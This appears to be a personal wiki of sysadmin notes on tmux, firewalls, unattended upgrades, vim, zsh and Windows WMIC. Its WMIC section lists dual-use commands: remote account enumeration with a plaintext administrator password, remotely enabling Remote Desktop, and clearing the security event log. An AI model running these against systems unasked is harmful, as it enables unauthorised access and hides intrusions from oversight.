tmux send-keys -t daemons:2 '/usr/bin/python2 /opt/sabnzbd/SABnzbd.py -f /home/makefu/.sabnzbd.ini/sabnzbd.ini -d' C-m
tmux send-keys -t daemons:3 'DISPLAY=:0.0 redshift -l 9.16:48.8' C-m
tmux send-keys -t daemons:4 'DISPLAY=:0.0 twinkle' C-m
}}}
or
{{{
tmux new-session "$CMD"
}}}
!Splitting
{{{C-B :split-window -h}}} splits the window to have left and right
{{{C-B ARROW}}} move to next split
! Create ISO
{{{
mkisofs -o /tmp/cd.iso /tmp/directory
}}}
! install u3-tool with libusb
until very recently u3-tool does not seem to support sg-submodule (or something i do not really know).
Try building u3-tool for libusb
{{{
wget http://downloads.sourceforge.net/project/u3-tool/u3-tool/0.3/u3-tool-0.3.tar.gz
tar xf this_file
cd u3-tool-0.3
./configure --with-libusb --prefix=/usr LIBS=-lusb
make install
}}}
! burn image
{{{
modprobe -r usb-storage
u3-tool -p500000000 /dev/sdx
u3-tool -i file.iso /dev/sdx
}}}
! Fresh install
!! Install MTA
see [[msmtp]]
!! Unattended Upgrades
{{{
aptitude install unattended-upgrades
}}}
!!! automagic
{{{
sudo dpkg-reconfigure -plow unattended-upgrades
}}}
!!! manual
in {{{/etc/apt/apt.conf.d/50unattended-upgrades}}} append
{{{
Unattended-Upgrade::Mail "me@domain.com";
Unattended-Upgrade::MailOnlyOnError "true";
Unattended-Upgrade::Remove-Unused-Dependencies "true";
}}}
in {{{/etc/apt/apt.conf.d/20auto-upgrades}}}
{{{
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
APT::Periodic::Download-Upgradeable-Packages "1";
APT::Periodic::AutocleanInterval "7";
}}}
also see {{{/etc/cron.daily/apt}}}
! syntax
{{{
# allow port on interface
ufw allow in on retiolum from any port 46299
# allow ipv6 address
ufw allow from 42:0b2c:d90e:e717:03dc:9ac1:7c30:a4db to any
}}}
! update a link
{{{
update-alternatives --config ruby
}}}
query
{{{
update-alternatives --query rub
}}}
! miranda
{{{
wget ``miranda from here somewhere: https://code.google.com/p/mirandaupnptool/ ``
python2 miranda.py
msearch
host get 0
host info 0
host summary 0
help
}}}
a better Terminal Emulator:
in {{{~/.Xdefaults}}}
{{{
URxvt*matcher.button: 1
URxvt*perl-ext: default,matcher
URxvt.urlLauncher: chromium
URxvt*matcher.pattern.1:\\bwww\\.[\\w-]+\\.[\\w./?&@#-]*[\\w/-]
}}}
! openwrt
packages: {{{usbip usbip-server kmod-usbip-server}}}
! usage
!! Server
{{{
usbipd -D
usbip list -l
...
usbip bind <<USB-BUSID>>
}}}
!! Client
{{{
usbip list -r <<SERVER>
usbip attach -h <<SERVER>> -b <<USB-BUSID>>
}}}
!Inception Hosting
!! Debian 6
{{{
#mknod /dev/xvda b 202 0
sed -i 's/sda/xvda/' /boot/grub/device.map:
#Edit /usr/sbin/update-grub
#Replace:
#find_device ()
#{
#if ! test -e ${device_map} ; then
#echo quit | grub --batch --no-floppy --device-map=${device_map} > /dev/null
#fi
#grub-probe --device-map=${device_map} -t device $1 2> /dev/null
#}
##With:
#
#find_device ()
#{
#if ! test -e ${device_map} ; then
#echo quit | grub --batch --no-floppy --device-map=${device_map} > /dev/null
#fi
##grub-probe --device-map=${device_map} -t device $1 2> /dev/null
#
#echo /dev/xvda
#}
update-grub 0
sed -i "s/xvda/xvda1/g" /boot/grub/menu.lst
}}}
! Iptables
{{{
apt-get install iptables-persistent
cat <<EOF > /etc/iptables/rules
# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
*nat
:PREROUTING ACCEPT [1:60]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
#-A PREROUTING -i venet0:0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 22
COMMIT
# Completed on Wed May 16 17:39:35 2012
# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
*mangle
:PREROUTING ACCEPT [4608:600641]
:INPUT ACCEPT [4608:600641]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [4662:571608]
:POSTROUTING ACCEPT [4662:571608]
COMMIT
# Completed on Wed May 16 17:39:35 2012
# Generated by iptables-save v1.4.8 on Wed May 16 17:39:35 2012
*filter
:INPUT DROP [27:19186]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [4662:571608]
-A INPUT -i lo -j ACCEPT
-A INPUT -i retiolum -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 655 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 9111 -j ACCEPT
COMMIT
# Completed on Wed May 16 17:39:35 2012
EOF
}}}
! .vimrc
! Plugins
! Tipps
!! Goto file and back
{{{ gf }}} to go into file and {{{CTRL-O}}} to go back again
!! open words manpage
{{{
K
}}}
!! copy char from row above
CTRL + y
!! Shell Colors
{{{Ctrl-V ESC}}} for escaping {{{^[}}}
write :
{{{<ESC>[{attr};{fg};{bg}m}}}
{{{
{attr} is one of following
0 Reset All Attributes (return to normal mode)
1 Bright (Usually turns on BOLD)
2 Dim
3 Underline
5 Blink
7 Reverse
8 Hidden
{fg} is one of the following
30 Black
31 Red
32 Green
33 Yellow
34 Blue
35 Magenta
36 Cyan
37 White
{bg} is one of the following
40 Black
41 Red
42 Green
43 Yellow
44 Blue
45 Magenta
46 Cyan
47 White
}}}
! /etc/vncserver oder /etc/sysconfig/vncserver
{{{
VNCSERVERS="2:username"
VNCSERVERARGS[2]=" -nolisten tcp -nohttpd "
}}}
! $HOME/.vnc/xstartup
{{{
unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc
}}}
! init
{{{
vnstat -u -i venet0
vnstat -u -i retiolum
}}}
! compiling
!! fresh
{{{
./configure --prefix=/usr --sysconfdir=/etc
make install
}}}
!! UTF-8 is broken after compilation
{{{
# you might have missed these two lines when doing ./configure:
## *** ncursesw library not found! Falling back to "ncurses"
## *** Be careful, UTF-8 display may not work properly if your locale is UTF-8.
#install ncursesw header
apt-get install libncursesw-dev
}}}
! search
you will need 0.4.2 or higher. see {{{http://weechat.org/files/doc/devel/weechat_user.en.html#key_bindings_search_context}}}.
{{{
/key resetall -yes search
/save
# search in nick names,etc
ctrl-r and TAB...
}}}
!! grep
{{{
/script install grep.py
/grep ball
/help grep
}}}
! Processes
see also http://isc.sans.edu/diary.html?storyid=2376
{{{
wmic /?
wmic process where (name="cmd.exe" or name="calc.exe") list brief
wmic process where (executablepath like "%system32%") list brief
wmic process list brief
wmic process where name="cmd.exe" delete #kill process
wmic process where name="cmd.exe" call terminate #
wmic process call create cmd.exe
}}}
! Users
{{{
wmic useraccount
}}}
! Network
{{{
wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.0.0.0")
wmic nicconfig where Index=1 call EnableDHCP
netsh /? # alternative to wmic
}}}
!! Remote access
{{{
wmic /user:"lab\Administrator" /password:"letmein" /node:@"pclist.txt" useraccount list full #or /node:"192.168.1.1"
}}}
!! Remote Desktop
{{{
wmic /node:"servername" RDtoggle where servername="servername" get AllowTSConnections #check for remote desktop
wmic /node:"servername" RDToggle" where servername="servername" call SetAllowTSConnections 1
wmic /node:servername path Win32_terminaleServiceSetting where AllowTSConnections=0 call SetAllowTSConnections 1
}}}
! Logging
{{{
wmic nteventlog list brief
wmic nteventlog where "Logfilename = 'System'" Call BackupEventLog "eventlog.evt"
wmic nteventlog where "logfilename = 'security'" call cleareventlog
}}}
! misc
{{{
wmic qfe #quick fix engineering
wmic startup list full #show all the files loaded
wmic /output:os.html os get /format:hform # get os intel in html format
}}}
! Basics
{{{
#!/usr/bin/python2
import wx
class MainFrame(wx.Frame):
def __init__(self,parent,title):
wx.Frame.__init__(self,parent,title=title,size=(200,100))
self.control = wx.TextCtrl(self,style=wx.TE_MULTILINE)
self.CreateStatusBar()
filemenu = wx.Menu()
menuAbout = filemenu.Append(wx.ID_ABOUT,"&About","About this program")
menuExit = filemenu.Append(wx.ID_EXIT,"E&xit","Terminate")
menuBar = wx.MenuBar()
menuBar.Append(filemenu,"&File")
self.SetMenuBar(menuBar)
self.Bind(wx.EVT_MENU,self.OnAbout,menuAbout)
self.Bind(wx.EVT_MENU,self.OnExit,menuExit)
self.Show(True)
def OnAbout(self,e):
dlg = wx.MessageDialog(self,"Small Text editor", "about Sample",
wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnExit(self,e):
self.Close(True)
app = wx.App(False)
frame = MainFrame(None,"Hello World")
app.MainLoop()
}}}
! run script
RunScript(script.xxx) or RunAddon(addon.xxx)
{{{
xbmc-send -a 'RunScript(script.games.rom.collection.browser)'
xbmc-send -a "Notification(Hey,Hey there this is a message)"
}}}
chromium will use xdg-open to open files.
When perl-file-mimeinfo is installed, xdg-open will use mimeopen.
{{{
mimeopen -d
}}}
will let you choose which tool to use for opening the file
!config path
it can also be configured either in
{{{/usr/share/applications/defaults.list }}}
or
{{{~/.local/share/applications/defaults.list}}}
debug and test x11 input (find the current keysyms, keycodes, everythin)
great to remap buttons with [[xmodmap]]
! Disable Standby
in xorg.conf
{{{
Section "ServerFlags"
Option "BlankTime" "0"
Option "StandbyTime" "0"
Option "SuspendTime" "0"
Option "OffTime" "0"
EndSection
}}}
! Installation
!! Ubuntu
{{{
echo "deb http://winswitch.org/ precise main" | sudo tee /etc/apt/sources.list.d/winswitch.list
curl http://winswitch.org/gpg.asc | sudo apt-key add -
sudo aptitude update
sudo aptitude install winswitch
}}}
also see [[rpm]]
!Create local Repository
choose from os/updates and x86_64/i386 and version 5/5.1/5.2 ...
{{{
rsync -avrt ftp-stud.fht-esslingen.de::centos/5/os/x86_64 5/os/
}}}
! Repository from DVD
http://wiki.centos.org/HowTos/CreateLocalRepos
1. Copy all files from the DVD
{{{
mount /dev/cdrom /mnt
cp -rv /mnt/CentOS /mnt/repodata /var/www/html/centos/5/os/x86_64/
umount /mnt
}}}
2. create a local.repo file and save it into the /etc/yum.repos.d directory:
{{{
[local]
name=CentOS-$releasever – local packages for $basearch
baseurl=file:///path/to/centos/$releasever/local/$basearch
enabled=1
gpgcheck=0
protect=1
}}}
3. use createrepo script for custom rpms (non-cd non-default)
{{{
createrepo /var/www/html/centos/5/local/x86_64
}}}
in {{{~/.zshrc}}}
{{{
# bindkey -v # vi mode
bindkey -e # emacs mode
<C-A> - Beginning of line
<C-E> - End of line
}}}
!coloring
{{{
autoload colors; colors
export PS1="%{$fg[green]%}[%{$reset_color%}%n@%m %~%{$fg[green]%}]%{$reset_color%}$ " # colorizes the brackets
}}}
! Change default shell
{{{
chsh -s /bin/zsh
}}}
! Oh my zsh
more at {{{https://github.com/robbyrussell/oh-my-zsh}}}
{{{
git clone git://github.com/robbyrussell/oh-my-zsh.git ~/.oh-my-zsh
cp ~/.zshrc ~/.zshrc.orig # will need to rewrite it anyway
cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc
}}}
in new .zshrc
{{{
export ZSH=$HOME/.oh-my-zsh
export ZSH_THEME="gallifrey" #or fishy
plugins=(git ssh-agent)
# and all the other stuff
test -r ~/Dropbox/shared_shell && source ~/Dropbox/shared_shell
}}}
!! uninstall ohmyzsh
{{{
uninstall_oh_my_zsh
}}}
! Bookmarks
{{{
# From https://gist.github.com/835905
# Original code for bash from:
# http://www.huyng.com/archives/quick-bash-tip-directory-bookmarks/492/
# Zsh Directory Bookmarks
alias m1='alias g1="cd `pwd`"'
alias m2='alias g2="cd `pwd`"'
alias m3='alias g3="cd `pwd`"'
alias m4='alias g4="cd `pwd`"'
alias m5='alias g5="cd `pwd`"'
alias m6='alias g6="cd `pwd`"'
alias m7='alias g7="cd `pwd`"'
alias m8='alias g8="cd `pwd`"'
alias m9='alias g9="cd `pwd`"'
alias mdump='alias -L|grep -e "alias g[0-9]"|grep -v "alias m" > ~/.bookmarks'
alias lma='alias -L|grep -e "alias g[0-9]"|grep -v "alias m"|sed "s/alias //"'
touch ~/.bookmarks
source ~/.bookmarks
}}}